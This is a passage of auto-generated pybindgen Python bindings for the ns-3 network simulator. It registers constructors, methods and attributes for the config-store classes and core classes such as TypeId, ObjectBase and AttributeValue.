## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3GtkConfigStore_methods(root_module, cls):
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
cls.add_constructor([])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
return
def register_Ns3NoneFileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_virtual=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3ConfigStore_methods(root_module, cls):
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
cls.add_constructor([])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
cls.add_method('SetFileFormat',
'void',
[param('ns3::ConfigStore::FileFormat', 'format')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::ConfigStore::Mode', 'mode')])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
